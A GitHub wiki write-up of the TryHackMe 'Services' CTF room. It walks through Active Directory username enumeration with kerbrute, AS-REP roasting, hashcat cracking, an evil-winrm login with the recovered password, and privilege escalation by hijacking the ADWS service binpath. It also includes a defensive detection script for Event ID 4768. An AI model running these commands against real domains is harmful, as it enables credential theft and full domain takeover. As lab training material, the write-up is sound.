"Services" TryHackMe Write‐up - CTF-Walkthroughs/CTF-Walkthroughs-Wiki GitHub Wiki


Services-THM-Walkthrough

This is the writeup for the Services CTF challenge on TryHackMe! https://tryhackme.com/room/services


tags: enumerate, hash cracking, exploit, brute-force, kerbrute

Highlight: enumerating Active Directory users with kerbrute, then capturing a password hash with AS-REP roasting.

ENUMERATION

First, let's kick things off with some classic nmap scans to get a lay of the land.

Initial setup (target and attacker addresses as variables):

`export IP=10.10.117.221`
`export myIP=10.13.24.71`

Quick full-port scan, keeping only the open ports:

`sudo nmap -v --min-rate 10000 <Target's IP address> -p- | grep open`

We can use sed and awk to efficiently sort the nmap results (saved here to a file named tmp) and turn the open ports into a comma-separated list for a script scan:

`cat tmp | sed 's/\// /g' | awk '{print $1}' | tr "\n" ","`

We'll follow up now with a full version and script scan of those ports:

`sudo nmap -v -sVC -oN nmap.txt <Target's IP address> -p <ports>`

SMB enumeration:

`smbclient -L //$IP/`
`smbmap -u 'anonymous' -H $IP`

WEB ENUMERATION: walk the port 80 website. We quickly identify some employee names from the staff listed on the site.

The contact email reveals the naming convention the domain uses for usernames.

Using the naming convention from the contact email, we can now compile a shortlist of possible usernames.

Next, we'll move on to active directory username enumeration.

KERBRUTE

`kerbrute userenum --dc $IP -d services.local users.txt`

We found some valid users!

AS-REP ROASTING WITH GetNPUsers.py

`GetNPUsers.py -dc-ip $IP -request 'services.local/' -usersfile users.txt -format hashcat`

Boom Shack-a-lacka! j.rock hash is revealed!
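Seen from the domain controller, the two steps above (a wordlist of usernames thrown at the KDC, then an AS-REQ for an account that does not require pre-authentication) leave a footprint in Security Event ID 4768. The following is an added example, not part of the original walkthrough, that runs that detection logic over constructed 4768 records reduced to the relevant fields; the field names and the enumeration threshold are my own choices.

```python
# Added example: detect the AS-REP roasting path on the DC side, using
# constructed Event ID 4768 (TGT requested) records, not real log data.
from collections import defaultdict

RC4_HMAC = 0x17                      # etype 23, the type hashcat mode 18200 cracks
NO_PREAUTH = 0                       # PreAuthType 0: account has DONT_REQ_PREAUTH set
KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6    # the requested username does not exist

# Constructed sample: an enumeration burst, one roastable account, normal traffic.
EVENTS = [
    {"id": 4768, "user": "a.smith", "ip": "10.13.24.71", "status": 0x6, "preauth": None, "etype": None},
    {"id": 4768, "user": "b.jones", "ip": "10.13.24.71", "status": 0x6, "preauth": None, "etype": None},
    {"id": 4768, "user": "c.brown", "ip": "10.13.24.71", "status": 0x6, "preauth": None, "etype": None},
    {"id": 4768, "user": "j.rock",  "ip": "10.13.24.71", "status": 0x0, "preauth": 0,    "etype": 0x17},
    {"id": 4768, "user": "svc_web", "ip": "10.10.117.5", "status": 0x0, "preauth": 2,    "etype": 0x12},
    {"id": 4768, "user": "j.rock",  "ip": "10.10.117.9", "status": 0x0, "preauth": 2,    "etype": 0x12},
]


def asrep_roast_candidates(events):
    """Successful TGT requests that skipped pre-auth and used RC4: the exact
    combination that hands an attacker a crackable $krb5asrep$23$ hash."""
    return sorted({(e["user"], e["ip"]) for e in events
                   if e["id"] == 4768 and e["status"] == 0
                   and e["preauth"] == NO_PREAUTH and e["etype"] == RC4_HMAC})


def username_enum_sources(events, threshold=3):
    """Source IPs that caused >= threshold 'unknown principal' failures for
    distinct names: the heuristic footprint of a wordlist-driven userenum."""
    unknown = defaultdict(set)
    for e in events:
        if e["id"] == 4768 and e["status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            unknown[e["ip"]].add(e["user"])
    return sorted(ip for ip, names in unknown.items() if len(names) >= threshold)


if __name__ == "__main__":
    print("AS-REP roast candidates:", asrep_roast_candidates(EVENTS))
    print("Username enumeration sources:", username_enum_sources(EVENTS))
```

The lasting fix for a flagged account is to clear its "Do not require Kerberos preauthentication" flag; the detections above then stop firing for it.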

CRACKING THE HASH WITH HASHCAT

Use hashcat to crack the hash: `hashcat -m 18200 hash.txt rockyou.txt`

Bingo! We are in business. Let's log in next with evil-winrm using our newly-found creds: j.rock:Serviceworks1

EVIL-WINRM

`evil-winrm -i $IP -u j.rock -p Serviceworks1`

LOCAL ENUMERATION

`whoami /all`

We see that j.rock is in the

Next, let's check services:

`services`

Our privesc path forward will be binpath hijacking with the ADWS service.

BINPATH HIJACKING

`sc.exe config ADWS binpath= "net localgroup administrators j.rock /add"`

Start and stop the service, then log out and back in so the new group membership takes effect.

CHANGE THE ADMIN PASSWORD

`net user administrator hellothisisatest123!`

Log out and back in as the administrator.

Grab the root flag!
